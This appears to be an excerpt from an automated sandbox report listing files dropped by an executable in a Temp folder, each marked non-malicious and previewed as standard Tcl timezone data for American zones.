                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.961168755371772
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2043
                                                                                                                                                                                                                                                    Entropy (8bit):3.9713587246734114
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Mendoza) {. {-9223372036854775808 -16516 0 LMT}. {-2372095484 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2041
                                                                                                                                                                                                                                                    Entropy (8bit):3.9709004305556337
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Rio_Gallegos) {. {-9223372036854775808 -16612 0 LMT}. {-2372095388 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1974
                                                                                                                                                                                                                                                    Entropy (8bit):3.957678973420544
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Salta) {. {-9223372036854775808 -15700 0 LMT}. {-2372096300 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.965568294539527
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Juan) {. {-9223372036854775808 -16444 0 LMT}. {-2372095556 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2050
                                                                                                                                                                                                                                                    Entropy (8bit):3.978156963589212
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/San_Luis) {. {-9223372036854775808 -15924 0 LMT}. {-2372096076 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.9614731054580163
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Tucuman) {. {-9223372036854775808 -15652 0 LMT}. {-2372096348 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2036
                                                                                                                                                                                                                                                    Entropy (8bit):3.9614879453725877
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Ushuaia) {. {-9223372036854775808 -16392 0 LMT}. {-2372095608 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.760006229014668
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Aruba) $TZData(:America/Curacao).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7810
                                                                                                                                                                                                                                                    Entropy (8bit):3.766817466650462
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Asuncion) {. {-9223372036854775808 -13840 0 LMT}. {-2524507760 -13840 0 AMT}. {-1206389360 -14400 0 PYT}. {86760000 -10800 0 PYT}. {134017200 -14400 0 PYT}. {162878400 -14400 0 PYT}. {181368000 -10800 1 PYST}. {194497200 -14400 0 PYT}. {212990400 -10800 1 PYST}. {226033200 -14400 0 PYT}. {244526400 -10800 1 PYST}. {257569200 -14400 0 PYT}. {276062400 -10800 1 PYST}. {291783600 -14400 0 PYT}. {307598400 -10800 1 PYST}. {323406000 -14400 0 PYT}. {339220800 -10800 1 PYST}. {354942000 -14400 0 PYT}. {370756800 -10800 1 PYST}. {386478000 -14400 0 PYT}. {402292800 -10800 1 PYST}. {418014000 -14400 0 PYT}. {433828800 -10800 1 PYST}. {449636400 -14400 0 PYT}. {465451200 -10800 1 PYST}. {481172400 -14400 0 PYT}. {496987200 -10800 1 PYST}. {512708400 -14400 0 PYT}. {528523200 -10800 1 PYST}. {544244400 -14400 0 PYT}. {560059200 -10800 1 PYS
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):332
                                                                                                                                                                                                                                                    Entropy (8bit):4.582750266902939
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Atikokan) {. {-9223372036854775808 -21988 0 LMT}. {-2366733212 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765388800 -18000 0 EST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172
                                                                                                                                                                                                                                                    Entropy (8bit):4.761501750421919
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Adak)]} {. LoadTimeZoneFile America/Adak.}.set TZData(:America/Atka) $TZData(:America/Adak).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1974
                                                                                                                                                                                                                                                    Entropy (8bit):3.912191186217954
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia) {. {-9223372036854775808 -9244 0 LMT}. {-1767216356 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6625
                                                                                                                                                                                                                                                    Entropy (8bit):3.791871111929614
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bahia_Banderas) {. {-9223372036854775808 -25260 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):413
                                                                                                                                                                                                                                                    Entropy (8bit):4.429320498710922
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Barbados) {. {-9223372036854775808 -14309 0 LMT}. {-1451678491 -14309 0 BMT}. {-1199217691 -14400 0 AST}. {234943200 -10800 1 ADT}. {244616400 -14400 0 AST}. {261554400 -10800 1 ADT}. {276066000 -14400 0 AST}. {293004000 -10800 1 ADT}. {307515600 -14400 0 AST}. {325058400 -10800 1 ADT}. {338706000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1010
                                                                                                                                                                                                                                                    Entropy (8bit):4.083219722112219
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belem) {. {-9223372036854775808 -11636 0 LMT}. {-1767213964 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {590032800 -10800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1829
                                                                                                                                                                                                                                                    Entropy (8bit):3.9821437108187077
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Belize) {. {-9223372036854775808 -21168 0 LMT}. {-1822500432 -21600 0 CST}. {-1616954400 -19800 1 CHDT}. {-1606069800 -21600 0 CST}. {-1585504800 -19800 1 CHDT}. {-1574015400 -21600 0 CST}. {-1554055200 -19800 1 CHDT}. {-1542565800 -21600 0 CST}. {-1522605600 -19800 1 CHDT}. {-1511116200 -21600 0 CST}. {-1490551200 -19800 1 CHDT}. {-1479666600 -21600 0 CST}. {-1459101600 -19800 1 CHDT}. {-1448217000 -21600 0 CST}. {-1427652000 -19800 1 CHDT}. {-1416162600 -21600 0 CST}. {-1396202400 -19800 1 CHDT}. {-1384713000 -21600 0 CST}. {-1364752800 -19800 1 CHDT}. {-1353263400 -21600 0 CST}. {-1333303200 -19800 1 CHDT}. {-1321813800 -21600 0 CST}. {-1301248800 -19800 1 CHDT}. {-1290364200 -21600 0 CST}. {-1269799200 -19800 1 CHDT}. {-1258914600 -21600 0 CST}. {-1238349600 -19800 1 CHDT}. {-1226860200 -21600 0 CST}. {-1206900000 -19800 1 CHDT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):331
                                                                                                                                                                                                                                                    Entropy (8bit):4.599775510303771
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Blanc-Sablon) {. {-9223372036854775808 -13708 0 LMT}. {-2713896692 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {14400 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1175
                                                                                                                                                                                                                                                    Entropy (8bit):4.020601379816668
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boa_Vista) {. {-9223372036854775808 -14560 0 LMT}. {-1767211040 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):238
                                                                                                                                                                                                                                                    Entropy (8bit):4.746762201325416
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Bogota) {. {-9223372036854775808 -17776 0 LMT}. {-2707671824 -17776 0 BMT}. {-1739041424 -18000 0 COT}. {704869200 -14400 1 COST}. {733896000 -18000 0 COT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8324
                                                                                                                                                                                                                                                    Entropy (8bit):3.772029913040983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boise) {. {-9223372036854775808 -27889 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-1471788000 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126255600 -25200 0 MST}. {129114000 -21600 0 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {2307
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):234
                                                                                                                                                                                                                                                    Entropy (8bit):4.775296176809929
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Buenos_Aires)]} {. LoadTimeZoneFile America/Argentina/Buenos_Aires.}.set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7487
                                                                                                                                                                                                                                                    Entropy (8bit):3.7913991050941216
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cambridge_Bay) {. {-9223372036854775808 0 0 zzz}. {-1577923200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
